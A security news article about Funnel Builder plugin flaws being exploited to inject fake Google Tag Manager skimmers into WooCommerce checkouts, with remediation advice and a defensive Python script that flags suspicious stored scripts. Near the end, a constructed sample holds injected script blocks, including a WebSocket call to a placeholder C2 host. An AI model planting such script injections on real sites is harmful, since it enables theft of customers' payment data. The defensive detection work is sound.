Urgent Alert: Funnel Builder Vulnerability Under Active Attack
A severe security flaw within the popular Funnel Builder plugin for WordPress is currently being exploited in the wild, posing a significant threat to e-commerce businesses. Attackers are leveraging this vulnerability to inject malicious JavaScript into WooCommerce checkout pages, with the explicit aim of siphoning sensitive payment information from unsuspecting customers. This critical issue, affecting over 40,000 WooCommerce stores, has been brought to light by security researchers at Sansec.
The Anatomy of the Attack: How Skimmers Infiltrate Your Checkout
The vulnerability, which lacks an official CVE identifier but impacts all Funnel Builder plugin versions prior to 3.15.0.3, allows unauthenticated attackers to inject arbitrary JavaScript code directly into every checkout page. Sansec, a Dutch e-commerce security firm, detailed how this is achieved:
Exploiting a Publicly Exposed Endpoint
Older versions of Funnel Builder contained a publicly accessible checkout endpoint designed to run various internal methods. Crucially, these versions failed to implement proper permission checks or restrict which methods could be invoked. This oversight created a critical loophole, enabling malicious actors to send unauthenticated requests that could trigger an internal method to write attacker-controlled data into the plugin’s global settings.
Disguised Malice: Fake Google Tag Manager Scripts
Once the attacker gains this foothold, they plant fake Google Tag Manager (GTM) scripts into the plugin’s ‘External Scripts’ setting. These malicious scripts are cunningly designed to mimic legitimate analytics code, often blending seamlessly with a store’s genuine tracking tags. This deceptive tactic, a recurring pattern in ‘Magecart’ attacks, allows the skimmer to evade casual detection by reviewers who might overlook anything resembling familiar analytics.
The Skimmer in Action: Real-time Data Theft
Sansec observed instances where the injected payload, masquerading as a GTM loader, launched JavaScript hosted on a remote domain. That script then established a WebSocket connection to the attacker’s command-and-control (C2) server (e.g., “wss://protect-wss[.]com/ws”). From this C2 server, a sophisticated skimmer, often tailored to the victim’s specific storefront, was retrieved and deployed. The ultimate objective is clear: to steal credit card numbers, CVVs, billing addresses, and other personal data entered by customers during checkout.
Immediate Action Required: Protect Your Customers and Business
FunnelKit, the maintainers of Funnel Builder, have responded swiftly by releasing a patch in version 3.15.0.3. All WooCommerce store owners utilizing the Funnel Builder plugin are strongly advised to:
- Update Immediately: Upgrade the Funnel Builder plugin to version 3.15.0.3 or later without delay.
- Scrutinize External Scripts: Navigate to Settings > Checkout > External Scripts within your WordPress dashboard and meticulously review for any unfamiliar or suspicious code snippets. Remove anything that cannot be positively identified as legitimate.
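To make that manual review repeatable, the following Python triage script (an added example, not code from Sansec or FunnelKit) takes the raw HTML stored in the External Scripts setting and flags each script block that loads from a host outside an allowlist, looks like a GTM loader but is served from a non-Google host, or opens a WebSocket, the three traits of the injected payload described above. The allowlist, the sample setting value and the placeholder hosts (.invalid) are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts a genuine Google Tag Manager loader is fetched from; extend with other
# vendors the store knowingly uses. Anything outside this set needs a human look.
ALLOWED_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}

SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
URL_IN_SCRIPT = re.compile(r"""(?:https?|wss?)://[^\s'"<>();]+""", re.I)
GTM_HINT = re.compile(r"googletagmanager|gtm\.js|GTM-[A-Z0-9]{4,}", re.I)
WEBSOCKET = re.compile(r"\bwss?://|new\s+WebSocket\s*\(", re.I)


def review_external_scripts(setting_html: str) -> list[dict]:
    """Triage each <script> stored in the 'External Scripts' setting.

    Returns one finding per block worth reviewing, with the reasons. A real GTM
    snippet references only googletagmanager.com and never opens a WebSocket,
    so foreign hosts, GTM look-alikes on foreign hosts, and WebSocket use are flagged.
    """
    findings = []
    for index, block in enumerate(SCRIPT_TAG.findall(setting_html), start=1):
        hosts = {urlparse(u).hostname or "" for u in URL_IN_SCRIPT.findall(block)}
        unknown = sorted(h for h in hosts if h not in ALLOWED_HOSTS)
        reasons = []
        if unknown:
            reasons.append("loads from non-allowlisted host(s): " + ", ".join(unknown))
        if unknown and GTM_HINT.search(block):
            reasons.append("looks like a GTM loader but is served from a non-Google host")
        if WEBSOCKET.search(block):
            reasons.append("opens a WebSocket channel (C2-style behaviour)")
        if reasons:
            findings.append({"script": index, "hosts": sorted(hosts), "reasons": reasons})
    return findings


# Constructed sample of an 'External Scripts' value: a genuine GTM snippet followed
# by two injected blocks modelled on the campaign (hosts are placeholders, not IoCs).
SAMPLE_SETTING = """
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],
j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;
f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-ABCD123');</script>
<script async src="https://tags.fake-gtm.invalid/gtm.js?id=GTM-ZZZZ999"></script>
<script>var s=new WebSocket("wss://c2.example.invalid/ws");</script>
"""

if __name__ == "__main__":
    for finding in review_external_scripts(SAMPLE_SETTING):
        print(finding)
```

Only blocks 2 and 3 of the sample are reported; the genuine GTM snippet passes clean, so the output is a short review queue rather than the whole setting.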
A Broader Threat Landscape: Beyond Funnel Builder
This incident underscores the persistent and evolving nature of cyber threats targeting e-commerce platforms. It follows closely on the heels of a separate campaign detailed by Sucuri, where Joomla websites were found to be backdoored with obfuscated PHP code. These backdoors allowed attackers to contact C2 servers, receive instructions, and serve spammy content to visitors and search engines, leveraging the sites’ reputation for malicious purposes. As security researcher Puja Srivastava noted, such remote loaders grant attackers dynamic control, enabling them to alter compromised website behavior at will, injecting spam, redirecting visitors, or displaying malicious pages without further local file modifications.
The Funnel Builder vulnerability serves as a stark reminder that proactive security measures and vigilance are paramount in safeguarding online businesses and customer trust.